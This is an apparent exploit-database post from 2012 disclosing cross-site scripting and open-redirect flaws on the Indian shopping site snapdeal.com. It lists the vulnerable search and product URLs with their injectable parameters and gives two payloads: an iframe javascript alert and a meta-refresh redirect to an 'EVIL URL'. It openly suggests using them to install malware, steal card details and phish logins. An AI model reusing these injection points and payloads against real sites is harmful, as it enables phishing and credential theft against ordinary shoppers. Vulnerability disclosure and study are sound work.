Home / exploits Snapdeal.com Cross Site Scripting / Redirection
Posted on 31 May 2012
Site: http://www.snapdeal.com Threat/Vulnerability: Cross site scripting a.k.a XSS, URL Redirection Severity : Moderate Author: Karthik R a.k.a 3psil0nlambda I have informed the owner (CEO) but got no response, acknowledgement of receipt of the mail. About the Site: India's fastest growing shopping site. Vulnerability: *XSS a.k.a Cross site scripting *URL Redirection Once found out the Vulnerability, it can be used in the following URL to create any attacks. *Installing malware in the name of Snapdeal.com and gain credit card and other important credentials *Phishing URL Redirection, and gain login-ID and password URL used for crafting attacks:- *http://www.snapdeal.com/search?categoryId=0&keyword= <inject XSS attack here> &vertical=all&clickSrc=go_recent&locId=0 *http://www.snapdeal.com/products/lifestyle-handbags-wallets?q=Brand:Jute Planet,A-maze&sort= <inject XSS attack here> Exploit: *XSS : "><IFRAME SRC="javascript:alert('XSS');"></IFRAME> *URL Redirection: "><meta HTTP-EQUIV="REFRESH" content="0; url=EVIL URL"> Greetz to side-effects, r4dc0re, lord crusader, team inject0r
